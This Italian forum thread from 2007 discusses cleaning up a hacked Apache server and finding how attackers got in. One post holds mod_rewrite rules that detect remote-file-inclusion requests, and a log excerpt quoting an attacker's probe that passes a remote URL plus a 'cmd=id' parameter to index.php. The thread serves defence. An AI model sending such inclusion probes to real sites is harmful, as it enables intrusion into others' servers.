Torna indietro   Hardware Upgrade Forum > Software > Linux, Unix, OS alternativi

Recensione Samsung Galaxy S26 Ultra: finalmente qualcosa di nuovo
Recensione Samsung Galaxy S26 Ultra: finalmente qualcosa di nuovo
Per diversi giorni il Galaxy S26 Ultra di Samsung è stato il nostro compagno di vita. Oltre alle conferme del colosso coreano come la qualità del display e una suite AI senza rivali, arriva il Privacy Display, un unicum nel mondo smartphone. Ci sono ancora alcuni gap che non sono riusciti a colmare lato batteria e fotocamera, seppur con alcuni miglioramenti.
Diablo II Resurrected: il nuovo DLC Reign of the Warlock
Diablo II Resurrected: il nuovo DLC Reign of the Warlock
Abbiamo provato per voi il nuovo DLC lanciato a sorpresa da Blizzard per Diablo II: Resurrected e quella che segue è una disamina dei nuovi contenuti che abbiamo avuto modo di sperimentare nel corso delle nostre sessioni di gioco, con particolare riguardo per la nuova classe dello Stregone
Deep Tech Revolution: così Area Science Park apre i laboratori alle startup
Deep Tech Revolution: così Area Science Park apre i laboratori alle startup
Siamo tornati nel parco tecnologico di Trieste per il kick-off del programma che mette a disposizione di cinque startup le infrastrutture di ricerca, dal sincrotrone Elettra ai laboratori di genomica e HPC. Roberto Pillon racconta il modello e la visione
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 21-06-2007, 12:26   #1
SergioL68
Senior Member
 
L'Avatar di SergioL68
 
Iscritto dal: Dec 2000
Città: Faenza
Messaggi: 1043
Sicurezza Server Bucato

Qualche consiglio ragazzi per cortesia, se non ve la sentite un link a qualche forum inglese anche se non sta molto bene qui.

In pratica hanno accesso al server tramite l'account apache, hanno scritto su delle dir con permessi 777 che ho immediatamente "piallato" e corretto.

Ora ci sono dei processi in esecuzione (sh chiamati da apache) che non riesco a "killare", cosa posso fare ?
__________________
My email: [email protected]
My web site : www.bodyweb.it
SergioL68 è offline   Rispondi citando il messaggio o parte di esso
Old 21-06-2007, 12:34   #2
W.S.
Senior Member
 
L'Avatar di W.S.
 
Iscritto dal: Nov 2005
Messaggi: 1868
Se hai accesso fisico alla macchina, non è troppo sensibile... insomma se puoi farlo, stacca il/i cavo/i di rete e lavoraci con calma.

Sempre se puoi, ferma apache e non avviarlo finchè non l'hai aggiornato.

Altrimenti (o comunque):
netstat -nalp e vedi se ci sono connessioni su quei processi, se si, prova a fermarle con regole in iptables (INPUT)

poi con calma vedi i log e cosa è successo

EDIT:
Una volta che hai chiuso eventuali connessioni, organizza la sospensione del servizio, stacca la macchina e studiatela con calma.
verifica i log, dai una bella passata di chkrootkit, verifica le versioni dei software installati tenta di capire cosa è stato fatto e assicurati che non possa + succedere. Se ne hai la possibilità megli se ripristini il sistema (da immagine o backup) precedenti in modo da essere sicuro di non avere rootkit/backdoor/simili installate.
__________________
[ W.S. ]

Ultima modifica di W.S. : 21-06-2007 alle 12:42.
W.S. è offline   Rispondi citando il messaggio o parte di esso
Old 21-06-2007, 12:41   #3
SergioL68
Senior Member
 
L'Avatar di SergioL68
 
Iscritto dal: Dec 2000
Città: Faenza
Messaggi: 1043
Quote:
Originariamente inviato da W.S. Guarda i messaggi
Se hai accesso fisico alla macchina, non è troppo sensibile... insomma se puoi farlo, stacca il/i cavo/i di rete e lavoraci con calma.

Sempre se puoi, ferma apache e non avviarlo finchè non l'hai aggiornato.

Altrimenti (o comunque):
netstat -nalp e vedi se ci sono connessioni su quei processi, se si, prova a fermarle con regole in iptables (INPUT)

poi con calma vedi i log e cosa è successo
Grazie mille, la macchina deve lavorare purtroppo e non posso staccarla, tra l'altro è in una server farm in Inghilterra.

Più che filtrare i processi (hanno messo in condivisione dei file, film, stupidaggini del geenre) volevo eliminare il processo che hanno caricato.

Sembra lo abbiano caricato e mandato in esecuzione dal web.

Non conosci per caso un modo sicuro per uccidere un processo ?
__________________
My email: [email protected]
My web site : www.bodyweb.it
SergioL68 è offline   Rispondi citando il messaggio o parte di esso
Old 21-06-2007, 12:44   #4
W.S.
Senior Member
 
L'Avatar di W.S.
 
Iscritto dal: Nov 2005
Messaggi: 1868
Quote:
Originariamente inviato da SergioL68 Guarda i messaggi
Ora ci sono dei processi in esecuzione (sh chiamati da apache) che non riesco a "killare", cosa posso fare ?
In che senso non riesci? Vengono riavviate immediatamente? Non succede nulla? Ti ritorna qualche errore?
__________________
[ W.S. ]
W.S. è offline   Rispondi citando il messaggio o parte di esso
Old 21-06-2007, 12:55   #5
W.S.
Senior Member
 
L'Avatar di W.S.
 
Iscritto dal: Nov 2005
Messaggi: 1868
questo potrebbe aiutarti:
http://www.linuxquestions.org/questi...d.php?t=561867
__________________
[ W.S. ]
W.S. è offline   Rispondi citando il messaggio o parte di esso
Old 21-06-2007, 12:55   #6
SergioL68
Senior Member
 
L'Avatar di SergioL68
 
Iscritto dal: Dec 2000
Città: Faenza
Messaggi: 1043
Quote:
Originariamente inviato da W.S. Guarda i messaggi
In che senso non riesci? Vengono riavviate immediatamente? Non succede nulla? Ti ritorna qualche errore?
Il processo sembra in effetti non essere ucciso, ma probabilmente viene ricaricato immediatamente.
sh un file che non trovo neppure, chiamato da apache, non vorrei mai che fosse un ssh.
__________________
My email: [email protected]
My web site : www.bodyweb.it
SergioL68 è offline   Rispondi citando il messaggio o parte di esso
Old 21-06-2007, 13:01   #7
W.S.
Senior Member
 
L'Avatar di W.S.
 
Iscritto dal: Nov 2005
Messaggi: 1868
vedi tramite ps che abbia pid diversi dopo ogni kill -9
sh immagino sia /bin/sh credo usino sh come interprete a qualche script..
ora devo staccare, torno nel pomeriggio
__________________
[ W.S. ]
W.S. è offline   Rispondi citando il messaggio o parte di esso
Old 21-06-2007, 13:22   #8
SergioL68
Senior Member
 
L'Avatar di SergioL68
 
Iscritto dal: Dec 2000
Città: Faenza
Messaggi: 1043
Ok, fatto fuori, era un altro processo lanciato in perl tramite l'apache che lo richiamava.

Ora vediamo se trovano altri buchi....




Dimenticavo, Grazie
__________________
My email: [email protected]
My web site : www.bodyweb.it

Ultima modifica di SergioL68 : 21-06-2007 alle 13:25.
SergioL68 è offline   Rispondi citando il messaggio o parte di esso
Old 21-06-2007, 15:05   #9
W.S.
Senior Member
 
L'Avatar di W.S.
 
Iscritto dal: Nov 2005
Messaggi: 1868
figurati

Per curiosità, il software installato dagli attaccanti rendeva disponibile materiale (video/mp3/warez) ad un canale irc? Ti hanno per caso lasciato i sorgenti da qualche parte?
__________________
[ W.S. ]
W.S. è offline   Rispondi citando il messaggio o parte di esso
Old 21-06-2007, 16:54   #10
stefanoxjx
Senior Member
 
L'Avatar di stefanoxjx
 
Iscritto dal: Jul 2002
Città: Padova
Messaggi: 4245
Deve essere una cosa simile a quella che è capitata a me.
Prova a vedere nella discussione che avevo aperto a suo tempo.

Ciao.
stefanoxjx è offline   Rispondi citando il messaggio o parte di esso
Old 21-06-2007, 17:00   #11
W.S.
Senior Member
 
L'Avatar di W.S.
 
Iscritto dal: Nov 2005
Messaggi: 1868
Quote:
Originariamente inviato da stefanoxjx Guarda i messaggi
Deve essere una cosa simile a quella che è capitata a me.
Prova a vedere nella discussione che avevo aperto a suo tempo.

Ciao.
esatto, volevo capire se sono gli stessi
__________________
[ W.S. ]
W.S. è offline   Rispondi citando il messaggio o parte di esso
Old 21-06-2007, 17:29   #12
stefanoxjx
Senior Member
 
L'Avatar di stefanoxjx
 
Iscritto dal: Jul 2002
Città: Padova
Messaggi: 4245
Quote:
Originariamente inviato da W.S. Guarda i messaggi
esatto, volevo capire se sono gli stessi
L'avevo intuito
stefanoxjx è offline   Rispondi citando il messaggio o parte di esso
Old 21-06-2007, 17:33   #13
W.S.
Senior Member
 
L'Avatar di W.S.
 
Iscritto dal: Nov 2005
Messaggi: 1868
Quote:
Originariamente inviato da stefanoxjx Guarda i messaggi
L'avevo intuito
hehe
__________________
[ W.S. ]
W.S. è offline   Rispondi citando il messaggio o parte di esso
Old 21-06-2007, 21:15   #14
darkbasic
Senior Member
 
L'Avatar di darkbasic
 
Iscritto dal: Dec 2004
Messaggi: 3573
Quote:
Originariamente inviato da stefanoxjx Guarda i messaggi
L'avevo intuito
Ci credi che ho pensato subito a te appena ho letto il topic?
__________________
Debian amd64 | Gentoo amd64 | AMD Athlon64 3800+ X2@2701Mhz vcore 1.49V | Placing an unpatched Windows computer directly onto the Internet in the hope that it downloads the patches faster than it gets exploited are odds that you wouldn't bet on in Vegas | e-mail+jabber: darkbasic|a.t|linuxsystems|d.o.t|it | www.linuxsystems.it
darkbasic è offline   Rispondi citando il messaggio o parte di esso
Old 21-06-2007, 22:47   #15
stefanoxjx
Senior Member
 
L'Avatar di stefanoxjx
 
Iscritto dal: Jul 2002
Città: Padova
Messaggi: 4245
Quote:
Originariamente inviato da darkbasic Guarda i messaggi
Ci credi che ho pensato subito a te appena ho letto il topic?
Assolutamente SI!!!
stefanoxjx è offline   Rispondi citando il messaggio o parte di esso
Old 22-06-2007, 04:38   #16
SergioL68
Senior Member
 
L'Avatar di SergioL68
 
Iscritto dal: Dec 2000
Città: Faenza
Messaggi: 1043
Quote:
Originariamente inviato da stefanoxjx Guarda i messaggi
Deve essere una cosa simile a quella che è capitata a me.
Prova a vedere nella discussione che avevo aperto a suo tempo.

Ciao.
Si, cosa molto simile, io non ho FlatNuke, ma uso vbulletin con diversi mods ed ho alcuni e-commerce sul server, è una situazione piuttosto delicata, qui hanno installato proxy, IRC EggDrop, processi cron, fake apache ed altre cosette.
Riesco a fermare i processi e credo di avere pulito tutto, ma non capisco da dove sono entrati.
Vorrei capire quello per correggerlo e fare in modo che la cosa non si ripeta.
__________________
My email: [email protected]
My web site : www.bodyweb.it
SergioL68 è offline   Rispondi citando il messaggio o parte di esso
Old 22-06-2007, 08:49   #17
cionci
Senior Member
 
L'Avatar di cionci
 
Iscritto dal: Apr 2000
Città: Vicino a Montecatini(Pistoia) Moto:Kawasaki Ninja ZX-9R Scudetti: 29
Messaggi: 53971
Sicuramente se sono riusciti ad entrare in quel modo, avranno anche pulito i vari log...
Prova a guardare il log di apache...

Che tipo di mod hai installato per vbulletin...qualsiasi mod che esegua qualche processo locale può essere l'indiziata...a meno che non abbiano sfruttato qualche exploit di Apache o MySQL, che versioni sono entrambi ?

Ultima modifica di cionci : 22-06-2007 alle 08:51.
cionci è offline   Rispondi citando il messaggio o parte di esso
Old 22-06-2007, 09:35   #18
W.S.
Senior Member
 
L'Avatar di W.S.
 
Iscritto dal: Nov 2005
Messaggi: 1868
Pure io credo siano entrati da qualche bug nelle applicazioni web, scarterei l'ipotesi di un attacco diretto ad apache (anche se possibile, la ritengo meno probabile). Contando che l'utente utilizzato è apache, scarterei anche l'attacco al db o ad altri demoni.

Oltre ai log dai pure un'occhio ai db, potrebbe esserci qualche record "sporcato" dall'attacco, magari riesci a farti un'idea del modulo sfruttato. Certo non sarà facilissimo trovarlo (se c'è) visto che avrai parecchi record immagino ma penso almeno un tentativo vada fatto.

Consiglio pure di verificare che i moduli e le applicazioni web siano ancora le stesse che hai installato, è probabile che abbiano installato qualche backdoor (anche una stupidissima funzione php).
__________________
[ W.S. ]
W.S. è offline   Rispondi citando il messaggio o parte di esso
Old 22-06-2007, 10:09   #19
gurutech
Senior Member
 
L'Avatar di gurutech
 
Iscritto dal: Jun 2000
Città: S.Giuliano (MI)
Messaggi: 1047
Quote:
Originariamente inviato da SergioL68 Guarda i messaggi
Qualche consiglio ragazzi per cortesia, se non ve la sentite un link a qualche forum inglese anche se non sta molto bene qui.
ciao,
a me tempo fa sono entrati da una pagina php tramite un cross site scripting.
da allora sto molto più attento al codice che scrivo, ed inoltre ho messo apache in chroot con questa modifica ad httpd.conf
Codice:
RewriteEngine on
RewriteLog /logs/rewrite.log
RewriteLogLevel 9
RewriteCond %{THE_REQUEST} php[^\ ]*(http|%68|%74|%70|%48|%54|%50) [NC]
RewriteRule . http://www.fuckyou.com/ [R]
RewriteCond %{THE_REQUEST} [?][^\ ]*(http|%68|%74|%70|%48|%54|%50) [NC]
RewriteRule . http://www.fuckyou.com/ [R]
RewriteCond %{THE_REQUEST} [?][^\ ]*([:][/][/]|%3a%2f%2f) [NC]
RewriteRule . http://www.fuckyou.com/ [R]
adesso quando fanno certe visitine nel log succede questo:
Codice:
81.208.36.87 - - [19/Jun/2007:10:42:36 +0200] [www.gurutech.it/sid#8126750][rid#85534a8/initial] (2) init rewrite engine with requested uri /index.php
81.208.36.87 - - [19/Jun/2007:10:42:36 +0200] [www.gurutech.it/sid#8126750][rid#85534a8/initial] (3) applying pattern '.' to uri '/index.php'
81.208.36.87 - - [19/Jun/2007:10:42:36 +0200] [www.gurutech.it/sid#8126750][rid#85534a8/initial] (4) RewriteCond: input='GET /index.php?sel=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1' pattern='php[^\]*(http|%68|%74|%70|%48|%54|%50)' [NC] => matched
81.208.36.87 - - [19/Jun/2007:10:42:36 +0200] [www.gurutech.it/sid#8126750][rid#85534a8/initial] (2) rewrite '/index.php' ->'http://www.fuckyou.com/'
inoltre ho riscritto index.php in modo da accettare solo file che dico io
Codice:
$lista=file("/listafile",FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);

$sel=$_GET['sel']
        or $sel="start";
if ( ! in_array($sel,$lista) ) {
        $sel="start";
}
__________________
“No te tomes tan en serio la vida, al fin y al cabo no saldrás vivo de ella”
gurutech è offline   Rispondi citando il messaggio o parte di esso
Old 22-06-2007, 11:25   #20
darkbasic
Senior Member
 
L'Avatar di darkbasic
 
Iscritto dal: Dec 2004
Messaggi: 3573
Quote:
Originariamente inviato da gurutech Guarda i messaggi
adesso quando fanno certe visitine nel log succede questo
Troppo bello!!!
__________________
Debian amd64 | Gentoo amd64 | AMD Athlon64 3800+ X2@2701Mhz vcore 1.49V | Placing an unpatched Windows computer directly onto the Internet in the hope that it downloads the patches faster than it gets exploited are odds that you wouldn't bet on in Vegas | e-mail+jabber: darkbasic|a.t|linuxsystems|d.o.t|it | www.linuxsystems.it
darkbasic è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Recensione Samsung Galaxy S26 Ultra: finalmente qualcosa di nuovo Recensione Samsung Galaxy S26 Ultra: finalmente ...
Diablo II Resurrected: il nuovo DLC Reign of the Warlock Diablo II Resurrected: il nuovo DLC Reign of the...
Deep Tech Revolution: così Area Science Park apre i laboratori alle startup Deep Tech Revolution: così Area Science P...
HP OMEN MAX 16 con RTX 5080: potenza da desktop replacement a prezzo competitivo HP OMEN MAX 16 con RTX 5080: potenza da desktop ...
Recensione Google Pixel 10a, si migliora poco ma è sempre un'ottima scelta Recensione Google Pixel 10a, si migliora poco ma...
Spotify introduce 'Taste Profile': il co...
Sole e pioggia insieme: il nuovo pannell...
AWS e Cerebras uniscono le forze: nuova ...
Windows 11: accesso al drive C: bloccato...
BYD pronta a comprare un marchio storico...
Windows 11 si prepara ai monitor oltre i...
Apple avrebbe fissato un target di vendi...
Ultimi giorni per sfruttare le Offerte d...
I migliori smartphone in offerta ora su ...
Le migliori TV delle Offerte di Primaver...
Uno dei robot più avanzati del 2025 crol...
Robot aspirapolvere con stazione automat...
Il nuovo top di gamma compatto di OPPO n...
Nilox aggiorna la sua gamma di fat e-bik...
Meta valuta tagli fino al 20% della forz...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 00:20.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Served by www3v